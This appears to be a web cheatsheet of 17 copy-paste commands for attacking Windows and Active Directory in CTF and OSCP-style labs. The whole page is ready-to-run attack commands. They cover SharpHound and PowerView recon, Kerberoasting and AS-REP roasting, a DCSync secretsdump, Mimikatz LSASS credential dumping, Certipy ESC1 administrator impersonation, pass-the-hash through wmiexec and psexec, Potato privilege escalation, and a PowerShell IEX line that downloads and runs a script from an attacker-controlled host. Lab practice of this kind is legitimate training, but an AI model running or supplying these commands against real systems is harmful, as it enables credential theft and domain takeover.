Windows & Active Directory cheatsheet
17 copy-paste commands for windows & active directory in CTFs and OSCP-style labs. Placeholders in braces, such as {TARGET_IP}, are values you fill in for your target.
SharpHound AD Collector Execution
Collect all Active Directory objects, trusts, ACLs, and sessions into zip archive.
.\SharpHound.exe -c All,GPOLocalGroup --zipfilename htb_ad.zipbloodhoundsharphoundadcollector
PowerView Domain & User Recon
Import PowerView and list domain controllers, domain users, and admin groups.
powershell -ep bypass
Import-Module .\PowerView.ps1
Get-DomainUser -SPN | select samaccountname,serviceprincipalname
Get-DomainGroupMember -Identity "Domain Admins"powerviewactive-directorykerberoasting
Impacket GetUserSPNs (Kerberoasting)
Request Kerberos TGS tickets for accounts with SPNs and output format for Hashcat / John.
impacket-GetUserSPNs {DOMAIN}/{USER}:{PASSWORD} -dc-ip {TARGET_IP} -request -outputfile hashes.kerberoastimpacketkerberoastspntgs
Impacket SecretsDump (NTDS.dit & SAM Dumps)
DCSync entire domain credentials directly over RPC using domain admin account.
impacket-secretsdump {DOMAIN}/{USER}:{PASSWORD}@{TARGET_IP} -just-dc-ntlmimpacketsecretsdumpdcsyncntds
Evil-WinRM Remote PowerShell Access
Connect to Windows target over WinRM port 5985 with credentials or Pass-The-Hash.
evil-winrm -i {TARGET_IP} -u {USER} -p "{PASSWORD}" -s /opt/scriptsevil-winrmwinrmshellpth
NetExec / CrackMapExec Domain Sweep
Check SMB credentials validity, local admin status (Pwn3d!), and password policies.
nxc smb {TARGET_IP} -u {USER} -p "{PASSWORD}" --sharesnetexeccmesmbshares
Mimikatz LogonPasswords LSASS Dump
Dump plaintext passwords and NTLM hashes from memory of LSASS process.
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
lsadump::lsa /patchmimikatzlsasshashesprivesc
Impacket GetNPUsers (AS-REP Roasting)
Query users with DONT_REQ_PREAUTH set to retrieve crackable Kerberos AS-REP hashes without creds.
impacket-GetNPUsers {DOMAIN}/ -usersfile users.txt -dc-ip {TARGET_IP} -format hashcat -outputfile asreproast.hashesimpacketasrepkerberosactive-directory
Certipy AD CS Vulnerable Template Enumeration
Find vulnerable Active Directory Certificate Services templates (ESC1-ESC13).
certipy find -u {USER}@{DOMAIN} -p "{PASSWORD}" -dc-ip {TARGET_IP} -vulnerable -stdoutcertipyadcscertificatesactive-directory
Certipy ESC1 Administrator Impersonation
Request certificate as Administrator using vulnerable ESC1 template allowing SAN specification.
certipy req -u {USER}@{DOMAIN} -p "{PASSWORD}" -dc-ip {TARGET_IP} -ca {CA_NAME} -template ESC1_Template -upn Administrator@{DOMAIN}certipyesc1impersonationactive-directory
Impacket WMIExec (Pass-The-Hash)
Execute semi-interactive commands over WMI using NTLM hash without knowing plaintext password.
impacket-wmiexec -hashes :{NTLM_HASH} {USER}@{TARGET_IP}impacketwmiexecpthlateral-movement
Impacket PSExec (Pass-The-Hash as SYSTEM)
Spawn SYSTEM service shell on target using NTLM hash over SMB port 445.
impacket-psexec -hashes :{NTLM_HASH} Administrator@{TARGET_IP}impacketpsexecpthwindows
WinPEAS In-Memory Download & Execute
Execute WinPEAS privilege escalation scanner directly in memory via WebClient.
powershell -ep bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://{LHOST}:8000/winPEAS.ps1')"winpeasprivescpowershellwindows
AlwaysInstallElevated Registry Query
Verify if MSI packages run with elevated SYSTEM permissions via registry keys.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated & reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedalwaysinstallelevatedmsiprivescwindows
Unquoted Service Path Enumeration
Detect auto-starting Windows services with unquoted executable paths containing spaces.
wmic service get name,displayname,pathname,startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """unquoted-servicewmicprivescwindows
GodPotato SeImpersonatePrivilege Exploit
Abuse SeImpersonatePrivilege on Windows Server 2012-2022 via DCOM/RPC reflection.
GodPotato-NET4.exe -cmd "cmd.exe /c whoami"godpotatoseimpersonatepotatoprivesc
PrintSpoofer SeImpersonate / Named Pipe Exploit
Elevate from service account to SYSTEM via print spooler named pipe reflection.
PrintSpoofer64.exe -i -c cmdprintspooferseimpersonatenamed-pipeprivesc
Use these commands with your values filled in. ZeroBox interpolates target IP, domain and credentials into every command. Open the cheatsheet